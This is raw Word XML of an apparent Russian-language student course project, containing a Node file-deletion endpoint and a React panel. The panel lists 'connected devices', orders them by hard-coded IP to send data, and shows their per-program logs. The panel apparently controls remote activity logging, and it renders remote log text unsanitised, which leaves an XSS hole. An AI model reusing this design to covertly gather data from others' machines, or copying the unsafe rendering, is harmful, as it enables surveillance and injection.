    <w:p w14:paraId="7E2D33D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272B50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43CB3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ilename.endsWith('.txt')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6506863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res.status(400).json({ error: "Only .txt files are allowed" });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46573DE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1BEE85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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288693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safeFilename = path.normalize(filename).replace(/^(\.\.(\/|\\|$))+/, '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC5D8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const filePath = path.join(DIR_PATH, safeFilename);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1E35C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</w:p>
    <w:p w14:paraId="3402382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if (!fs.existsSync(filePath)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543061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turn res.status(404).json({ error: "File not found" });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1BE31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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE5083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2C79B5D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fs.unlinkSync(filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544112D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7C2B2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res.status(204).end();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3991473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} catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1566227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console.error("Server error:", error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43D62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US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      res.status(500).json({ error: "Internal server error" });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158AB5DA" w14:textId="4CBA20D1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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F3FE75" w14:textId="2B75810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5E2ED89" w14:textId="7DBF94DE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9BF06FA" w14:textId="707B883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E26DA83" w14:textId="4399B6B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B039698" w14:textId="53B538A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6A4C67F7" w14:textId="103D592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C911E22" w14:textId="063DBB59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948F344" w14:textId="4EA9387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CE71E7E" w14:textId="5989A0A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FE47764" w14:textId="4AC4F99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1A6F909" w14:textId="7DAC7B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A7991" w14:textId="1016AA3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DB40113" w14:textId="101378D6" w:rsidR="00095ED0" w:rsidRPr="00CA7FAD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Pr="00CA7FAD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Г</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D99E4CF" w14:textId="150CA81D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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A501F0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>сходный</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FAD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A501F0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>код</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FAD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>клиентск</w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>ого</w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> веб-интерфейс</w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D1A395" w14:textId="707D7C58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BEE729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React, { useState, useEffect } from 'react';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ADE15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axios from 'axios';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AABB1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import '../css/MainPanel.css'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D5EF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Header from './Header.js';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754075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import ViewPanel from './ViewPanel.js';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E0F1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4ADDAC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const MainPanel = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CADE6C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[devices, setDevices] = useState([]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567BDA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[isLoading, setIsLoading] = useState(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688AA6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[selectedDevice, setSelectedDevice] = useState(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A21F4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[fileContent, setFileContent] = useState("Select a device to view its log");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BE41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64DFD85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highlightProgramNames = (logText) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7A9B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(!logText) return '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB700E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3AA6F1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const programBlocks = logText</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C73A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.trim()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CECD2E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.split(/(?=\[Program:)/g)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0462CAD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D0D8B4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const reversedBlocks = programBlocks.reverse();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA4FA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3329484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let trimmedText = reversedBlocks.join('&lt;hr&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C6835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immedText = trimmedText.replace(/\n\s*\n+/g, '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A884C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F9C1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return trimmedText.replace(/\[Program:[^\]]*\]/g, (match) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56738A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const innerText = match.slice(1, -1); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A466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return `&lt;strong&gt;${innerText}&lt;/strong&gt;&lt;br&gt;`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230E90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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D70E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554D62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4D87FE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0AF9E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fetchDevices = async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C608FA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setIsLoading(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F74F7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65507B9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const response = await axios.get('http://91.149.140.29:24242/getLogs');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA2A5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setDevices(response.data.map(file =&gt; ({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B02DD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id: file,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DA9D1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name: file.replace('.txt', '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCA5AD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)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0BED3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3D98C55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console.error('Failed to fetch devices:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D6F9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setDevices([]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A33BF0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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3531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setIsLoading(false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BC157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2F915F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771C1E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0CD9CA3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A2FCB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refreshAll = async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AFB13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axios.post('http://91.149.140.29:24242/command', {clientId: "all", action: "sendData" });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2E94E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setFileContent("Select a device to view its log");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F140AE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fetchDevices();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF44D9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if (selectedDevice) await handleDeviceClick(selectedDevice);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5065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6061370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0C894D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refreshDevice = async (device) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A69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axios.post(`http://91.149.140.29:24242/command`, {clientId: device.name, action: "sendData" });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082AE9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await handleDeviceClick(device);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7143A6B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4B5F08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7D33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handleDeviceClick = async (device) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C08496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setSelectedDevice(device);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F446A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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A46B5B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const response = await axios.get(`http://91.149.140.29:24242/getFile?file=${device.id}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B68A9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if(response.data.content === ""){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EFC3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setFileContent("Empty log");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673A86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return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54134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7373E8C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setFileContent(response.data.content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B5E2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 (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB76CE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console.error('Error loading file content:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D8C37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setFileContent('Error loading content');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCF69E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491E62D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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC2944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CBEDD7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const deleteFile = async (device) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6142826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try{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F92A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await axios.delete(`http://91.149.140.29:24242/delFile?file=${device.id}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482734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231C459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if (selectedDevice?.id === device.id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA7421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setSelectedDevice(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419E828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setFileContent("Select a device to view its log");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79036F8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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D9939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1D00A94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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            await fetchDevices();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6BE2D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 catch{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE9185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7F58503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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0B5E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2122DDA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519D2E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useEffect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FC63E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fetchDevices();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E91F4E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}, []);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106C32A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21E0257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return (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0AC05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div className="container"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A81AF9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main className="mainContent"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C39C92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eader /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE60D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37A73DC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ViewPanel </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F8C67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header={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E39E2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fileContent !== "Select a device to view its log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA82956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? `Viewing: ${selectedDevice?.name} (last updated: ${new </w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E36F17E" w14:textId="1F580680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>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Date().toLocaleTimeString()})`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDB58D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: undefined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ED44A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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6F3B7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onRefresh={async () =&gt; handleDeviceClick(selectedDevice)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184A2A8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onPull={() =&gt; refreshDevice(selectedDevice)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704EBAF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onClear={async () =&gt; deleteFile(selectedDevice)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176840F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5923C6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(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2623CCA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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466EF3F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&lt;pre </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299227A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className="logContent"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6707A16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dangerouslySetInnerHTML={{ __html: highlightProgramNames(fileContent) }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC8030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/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5628DAC4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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785D660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21FBF5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ViewPanel&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FC00E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main&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBBCD1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BB82BD9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aside className="sidebar"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0376EF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h2 className="title"&gt;{devices.length} Connected Devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2200BB9E" w14:textId="77777777" w:rsid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button className="refreshButton" onClick={fetchDevices} disabled={isLoading} </w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D4F958" w14:textId="3F28A9D9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>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>title="Refresh devices"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796E5B5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isLoading ? '' : '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19B3F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button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288C4A3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h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29071D9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11079B0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{isLoading ? (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD4101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className="loading"&gt;Loading devices...&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417A68C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 : devices.length === 0 ? (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101237B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p className="empty"&gt;No devices found&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F1364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 : (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BB71B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ul className="deviceList"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F058CD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{devices.map(device =&gt; (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F8B9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&lt;li </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADFC9F6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key={device.id} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2653E2F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className={`deviceItem ${selectedDevice?.id === device.id ? 'active' : ''}`}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B362C1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onClick={() =&gt; handleDeviceClick(device)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68454CF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style={{cursor: 'pointer'}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A6499E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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1762FA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span className="deviceName"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B30107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    {device.name}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF529AF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    &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114CE0B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    &lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D56750C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    ))}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D524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&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EBE59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)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD3EAA3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDD30C7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button </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA519A8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className="refreshAllButton"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD63A4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onClick={refreshAll}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64871740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disabled={isLoading}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D93E185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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3F7B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    {isLoading ? 'Refreshing...' : 'Refresh All Logs </w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>⟳</w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276012AA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    &lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB8CA0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    &lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2BCA01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    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F1898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 xml:space="preserve">    );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123652AB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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490E344D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</w:p>
    <w:p w14:paraId="40F94112" w14:textId="77777777" w:rsidR="00095ED0" w:rsidRPr="00095ED0" w:rsidRDefault="00095ED0" w:rsidP="00095ED0">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>export default MainPanel;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354213E0" w14:textId="77777777" w:rsidR="00095ED0" w:rsidRPr="00095ED0" w:rsidRDefault="00095ED0" w:rsidP="00095ED0">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1918276B" w14:textId="4EACF9A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CF17372" w14:textId="35E6D413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362B9D0" w14:textId="2D7F436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64943A6" w14:textId="43B4F57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03AD9D6" w14:textId="3CC3B245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A9ADE81" w14:textId="6256C1BE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538FC8" w14:textId="61BFCBDD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5FCBFD2" w14:textId="1C57894C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653AF050" w14:textId="212226C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63546A1" w14:textId="34E34EC7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F51FC4A" w14:textId="57486E1C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0B5101A" w14:textId="0D376674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21621BAD" w14:textId="4BCC83C7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FE85184" w14:textId="0E8C2832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1EEC7BA" w14:textId="307101F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A642615" w14:textId="6F15E1EC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58902F6" w14:textId="64436451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86C662C" w14:textId="41986B4B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F58F6C3" w14:textId="62FF5A80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793FBB29" w14:textId="1CFC0BDB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C5FA30F" w14:textId="4BFF2966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16E41BAD" w14:textId="48068BB9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E2B03CF" w14:textId="133E009B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CA9FD12" w14:textId="305E6F4F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1E10663" w14:textId="20BED1E4" w:rsidR="00095ED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5386EE12" w14:textId="77777777" w:rsidR="00095ED0" w:rsidRPr="00AA6BA0" w:rsidRDefault="00095ED0" w:rsidP="00095ED0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49345909" w14:textId="77777777" w:rsidR="00095ED0" w:rsidRPr="00095ED0" w:rsidRDefault="00095ED0"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noProof/>
          <w:sz w:val="20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67"/>
        <w:gridCol w:w="1559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549C55F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F5CE6D3" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Обозначение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4377" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A1038FF" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="24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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B674A5B" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Дополнительные сведения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00450B31" w14:paraId="6928358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C9B5E9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F89A479" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="004F5C3A"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1E777DF7" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00450B31" w14:paraId="193BB12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69B9E11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B0BDA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0C38E6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84C922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2072E69" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">БГУИР КП 1–40 01 01 </w:t>
            </w:r>
            <w:r w:rsidR="002A2B96">
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="00AA3EAE">
              <w:t>10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088C2972" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:bookmarkStart w:id="1" w:name="_Toc246409752"/>
            <w:r w:rsidRPr="004F5C3A">
              <w:t>Пояснительная записка</w:t>
            </w:r>
            <w:bookmarkEnd w:id="1"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1923" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="041EAFD8" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="004F5C3A" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="004F5C3A">
              <w:t>34</w:t>
            </w:r>
            <w:r w:rsidR="00450B31" w:rsidRPr="004F5C3A">
              <w:t xml:space="preserve"> с.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00450B31" w14:paraId="24D12CA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C8F2A0D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B4CE653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102CE170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3477615E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7AAC788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DB55D1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1C1D78E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EDB3F9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62DF138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FC638E" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F5C3A"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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="478405B1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CF476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2C23CAC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4278B0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C0DC870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2D89226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5F23425" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="002A2B96" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ГУИР </w:t>
            </w:r>
            <w:r w:rsidR="00C65B4B">
              <w:t>551001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidR="002A2B96">
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="00AA3EAE">
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="002A2B96"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47C75C76" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00662610" w:rsidP="004F5C3A"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 w:rsidRPr="004F5C3A">
              <w:rPr>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Программное средство</w:t>
            </w:r>
            <w:r w:rsidR="00D84142" w:rsidRPr="004F5C3A">
              <w:rPr>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F50F62" w:rsidRPr="004F5C3A">
              <w:rPr>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">для </w:t>
            </w:r>
            <w:r w:rsidR="00F50F62">
              <w:rPr>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ведения каталога преступлений</w:t>
            </w:r>
            <w:r w:rsidRPr="004F5C3A">
              <w:rPr>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>. Схема программы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1923" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4632FFB8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</w:t>
            </w:r>
            <w:r w:rsidR="002A2B96" w:rsidRPr="004F5C3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50B31" w14:paraId="20FBE352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0FA1DEB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5A78F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7DE94B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F7E25E4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A4C90C6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5AE52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8166DC6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D7C9C96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58050F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66AE7229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D5E80B6" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="34"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00450B31" w14:paraId="3E489D1D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708FF17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D306828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2518AA43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3F3AC79B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02C0340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2298F039" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:right="-108"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1923" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
